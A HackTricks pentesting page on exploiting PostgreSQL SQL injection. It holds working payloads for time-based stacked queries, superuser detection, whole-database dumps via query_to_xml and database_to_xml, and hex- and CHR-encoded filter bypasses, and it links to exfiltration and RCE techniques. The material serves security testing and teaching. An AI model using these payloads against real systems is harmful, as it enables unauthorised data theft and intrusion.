.. | ||
big-binary-files-upload-postgresql.md | ||
dblink-lo_import-data-exfiltration.md | ||
network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md | ||
pl-pgsql-password-bruteforce.md | ||
rce-with-postgresql-extensions.md | ||
rce-with-postgresql-languages.md | ||
README.md |
PostgreSQL injection
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
If you are interested in hacking career and hack the unhackable - we are hiring! (fluent polish written and spoken required).
{% embed url="https://www.stmcyber.com/careers" %}
This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md
Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration
The PostgreSQL module dblink
offers capabilities for connecting to other PostgreSQL instances and executing TCP connections. These features, combined with the COPY FROM
functionality, enable actions like privilege escalation, port scanning, and NTLM challenge response capture. For detailed methods on executing these attacks check how to perform these attacks.
Exfiltration example using dblink and large objects
You can read this example to see a CTF example of how to load data inside large objects and then exfiltrate the content of large objects inside the username of the function dblink_connect
.
PostgreSQL Attacks: Read/write, RCE, privesc
Check how to compromise the host and escalate privileges from PostgreSQL in:
{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %} pentesting-postgresql.md {% endcontent-ref %}
WAF bypass
PostgreSQL String functions
Manipulating strings could help you to bypass WAFs or other restrictions.
In this page you can find some useful Strings functions.
Stacked Queries
Remember that postgresql support stacked queries, but several application will throw an error if 2 responses are returned when expecting just 1. But, you can still abuse the stacked queries via Time injection:
id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
XML tricks
query_to_xml
This function will return all the data in XML format in just one file. It's ideal if you want to dump a lot of data in just 1 row:
SELECT query_to_xml('select * from pg_user',true,true,'');
database_to_xml
This function will dump the whole database in XML format in just 1 row (be careful if the database is very big as you may DoS it or even your own client):
SELECT database_to_xml(true,true,'');
Strings in Hex
If you can run queries passing them inside a string (for example using the query_to_xml
function). You can use the convert_from to pass the string as hex and bypass filters this way:
{% code overflow="wrap" %}
select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');
# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h
# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -
{% endcode %}
Forbidden quotes
If cannot use quotes for your payload you could bypass this with CHR
for basic clauses (character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc. It does not work for all SQL statements):
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
Or with $
. This queries return the same results:
SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
If you are interested in hacking career and hack the unhackable - we are hiring! (fluent polish written and spoken required).
{% embed url="https://www.stmcyber.com/careers" %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.